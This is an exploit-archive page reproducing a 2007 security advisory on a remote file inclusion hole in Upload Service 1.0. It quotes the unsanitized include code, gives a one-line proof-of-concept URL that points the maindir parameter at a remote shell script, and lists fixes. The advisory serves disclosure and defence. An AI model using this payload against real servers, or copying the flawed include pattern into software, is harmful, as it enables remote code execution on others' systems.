Search...

Upload Service 1.0 top.php maindir Remote File Inclusion Vulnerability

2007-01-21T00:00:00

ID EDB-ID:3174
Type exploitdb
Reporter y3dips
Modified 2007-01-21T00:00:00

Description

Upload Service 1.0 (top.php maindir) Remote File Inclusion Vulnerability. Webapps exploit for php platform

                                        
                                            ------------------------------------------------------------------------------------
[ECHO_ADV_62$2007] Upload Service 1.0 remote file inclusion
------------------------------------------------------------------------------------

Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : January, 21st 2007
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv62-y3dips-2007.txt
Critical Lvl : Critical
------------------------------------------------------------------------------------


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Upload Service
version : 1.0
URL : http://bild-bearbeiten.de/
Download-path : http://bild-bearbeiten.de/scripts/upload_service_1.0.zip

---------------------------------------------------------------------------

1. Install directory are not being remove after installation process
2. Variables "$maindir" in top.php are not properly sanitized.

---------------top.php--------------------------------
...
include($maindir."config.php");
include($maindir."functions/error.php");
...
------------------------------------------------------------------


When register_globals=on and allow_fopenurl=on an attacker can exploit
this vulnerability with a simple php injection script.

Poc/Exploit:
~~~~~~~~~

http://127.0.0.1/upload/top.php?maindir=http://127.0.0.1/shell.php?

Solution:
~~~~~~
- Remember to remove your install directory and change config.php permission
- Simply Sanitize variable $maindir on affected files. (eg. $maindir=" ";)
- Turn off register_globals

Notification:
~~~~~~~~~

vendor not contact yet

---------------------------------------------------------------------------
Shoutz:
~~~~
~ my lovely ana
~ k-159 (my greatest brotha), the_day (young evil thinker), and all echo staff
~ newbie_hacker@yahoogroups.com
~ #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~

y3dips|| echo|staff || y3dips[at]gmail[dot]com
Homepage: http://y3dips.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

# milw0rm.com [2007-01-21]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:3174", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Upload Service 1.0 top.php maindir Remote File Inclusion Vulnerability", "description": "Upload Service 1.0 (top.php maindir) Remote File Inclusion Vulnerability. Webapps exploit for php platform", "published": "2007-01-21T00:00:00", "modified": "2007-01-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/3174/", "reporter": "y3dips", "references": [], "cvelist": [], "lastseen": "2016-01-31T17:53:48", "viewCount": 6, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2016-01-31T17:53:48", "rev": 2}, "dependencies": {"references": [], "modified": "2016-01-31T17:53:48", "rev": 2}, "vulnersScore": 0.0}, "sourceHref": "https://www.exploit-db.com/download/3174/", "sourceData": "------------------------------------------------------------------------------------\n[ECHO_ADV_62$2007] Upload Service 1.0 remote file inclusion\n------------------------------------------------------------------------------------\n\nAuthor : Ahmad Muammar W.K (a.k.a) y3dips\nDate Found : January, 21st 2007\nLocation : Indonesia, Jakarta\nweb : http://echo.or.id/adv/adv62-y3dips-2007.txt\nCritical Lvl : Critical\n------------------------------------------------------------------------------------\n\n\nAffected software description:\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nApplication : Upload Service\nversion : 1.0\nURL : http://bild-bearbeiten.de/\nDownload-path : http://bild-bearbeiten.de/scripts/upload_service_1.0.zip\n\n---------------------------------------------------------------------------\n\n1. Install directory are not being remove after installation process\n2. Variables \"$maindir\" in top.php are not properly sanitized.\n\n---------------top.php--------------------------------\n...\ninclude($maindir.\"config.php\");\ninclude($maindir.\"functions/error.php\");\n...\n------------------------------------------------------------------\n\n\nWhen register_globals=on and allow_fopenurl=on an attacker can exploit\nthis vulnerability with a simple php injection script.\n\nPoc/Exploit:\n~~~~~~~~~\n\nhttp://127.0.0.1/upload/top.php?maindir=http://127.0.0.1/shell.php?\n\nSolution:\n~~~~~~\n- Remember to remove your install directory and change config.php permission\n- Simply Sanitize variable $maindir on affected files. (eg. $maindir=\" \";)\n- Turn off register_globals\n\nNotification:\n~~~~~~~~~\n\nvendor not contact yet\n\n---------------------------------------------------------------------------\nShoutz:\n~~~~\n~ my lovely ana\n~ k-159 (my greatest brotha), the_day (young evil thinker), and all echo staff\n~ newbie_hacker@yahoogroups.com\n~ #e-c-h-o @irc.dal.net\n\n---------------------------------------------------------------------------\nContact:\n~~~~~\n\ny3dips|| echo|staff || y3dips[at]gmail[dot]com\nHomepage: http://y3dips.echo.or.id/\n\n-------------------------------- [ EOF ] ----------------------------------\n\n# milw0rm.com [2007-01-21]\n", "osvdbidlist": []}